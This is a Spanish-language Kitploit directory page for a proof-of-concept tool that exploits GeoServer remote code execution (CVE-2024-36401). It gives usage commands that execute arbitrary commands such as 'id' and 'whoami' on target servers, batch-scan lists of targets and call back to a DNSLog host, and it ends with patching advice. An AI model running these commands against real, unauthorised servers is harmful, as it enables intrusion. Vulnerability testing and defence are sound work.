Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-36401_Geoserver_RCE_POC — Este script es una herramienta de detección PoC (Proof of Concept) para la vulnerabilidad de ejecución remota de código en GeoServer (CVE-2024-36401). Dicha vulnerabilidad permite a un atacante ejecutar comandos arbitrarios en el servidor objetivo mediante la construcción de solicitudes específicas. | Kitploit
Herramientas/GitHubGitHub/amoy6228/cve-2024-36401_geoserver_rce_poc
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubamoy6228/cve-2024-36401_geoserver_rce_poc

CVE-2024-36401_Geoserver_RCE_POC

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
21hace 1 añoAún no revisado

Acerca de

Este script es una herramienta de detección PoC (Proof of Concept) para la vulnerabilidad de ejecución remota de código en GeoServer (CVE-2024-36401). Dicha vulnerabilidad permite a un atacante ejecutar comandos arbitrarios en el servidor objetivo mediante la construcción de solicitudes específicas.

Compartir

⚠️ Aviso legal: Esta herramienta está destinada únicamente a la investigación de seguridad y a pruebas autorizadas legalmente. No la utilices con fines ilegales. El usuario asume toda la responsabilidad legal.

Versión del README: [English | 中文]

Descripción de la vulnerabilidad

Este script es una herramienta de detección PoC (Proof of Concept) desarrollada para la vulnerabilidad de ejecución remota de código (CVE-2024-36401) en GeoServer. Esta vulnerabilidad permite a un atacante ejecutar comandos arbitrarios en el servidor objetivo mediante la construcción de solicitudes específicas.


Dependencias del entorno

Asegúrate de que tu entorno de ejecución tenga instaladas las siguientes dependencias:

  • Python 3.x
  • Bibliotecas de terceros:
    • requests
    • lxml

Puedes instalar las dependencias necesarias con el siguiente comando:

root@kitploit:~
pip install requests lxml

Instrucciones de uso

Detección de un único objetivo

root@kitploit:~
python poc.py -u http://target.com -d dnslog.example.com

O especifica el comando a ejecutar:

root@kitploit:~
python poc.py -u http://target.com -c "touch /tmp/vulntest"

Detección por lotes de múltiples objetivos

Prepara un archivo de texto que contenga varias URL objetivo (una por línea):

root@kitploit:~
python poc.py -uf targets.txt -d dnslog.example.com

O especifica un comando:

root@kitploit:~
python poc.py -uf targets.txt -c "id"

Documentación de uso detallada: Documentación de uso detallada


Descripción de parámetros

⚠️ Nota: los parámetros -d y -c no se pueden utilizar al mismo tiempo.


Ejemplo de salida

root@kitploit:~
[INFO] 爬取到3个有效的 Typenames,开始漏洞探测
[INFO] 目标: http://example.com
[INFO] 执行命令: whoami
[INFO] DNSLOG地址:

[INFO] 正在尝试 typeName: topp:states -> whoami
[+] 命令疑似成功执行!目标: http://example.com 命令: whoami

Características del script

  • Corrige el problema de la verificación fallida de la vulnerabilidad en el POC de Nuclei debido a que los Typenames estaban codificados de forma fija.
  • Extrae automáticamente toda la información de los Typenames y prueba de forma iterativa los Typenames explotables.
  • Admite la ejecución de comandos mediante el parámetro -c.
  • Admite pasar un archivo de URL para probar por lotes si existe la vulnerabilidad.

Recomendaciones de seguridad

  • Actualiza GeoServer a la última versión oficial lo antes posible.
  • Aplica control de acceso a las instancias de GeoServer expuestas a Internet.
  • Configura el firewall para restringir los orígenes de acceso a la interfaz /geoserver/wfs.

Contribuciones

Te invitamos a enviar un Issue o un Pull Request para ayudar a mejorar este proyecto.


Licencia

Este proyecto se distribuye bajo la licencia MIT. Puedes modificarlo, distribuirlo y utilizarlo comercialmente libremente, pero debes conservar el aviso de copyright.


Descargar herramienta
ParámetroDescripción
-u, --urlEspecifica una única dirección objetivo
-uf, --url-fileEspecifica la ruta del archivo que contiene varias URL objetivo
-d, --dnslogEspecifica la dirección DNSLog
-c, --commandEspecifica el comando a ejecutar en el sistema objetivo (por ejemplo: whoami, id, curl, etc.)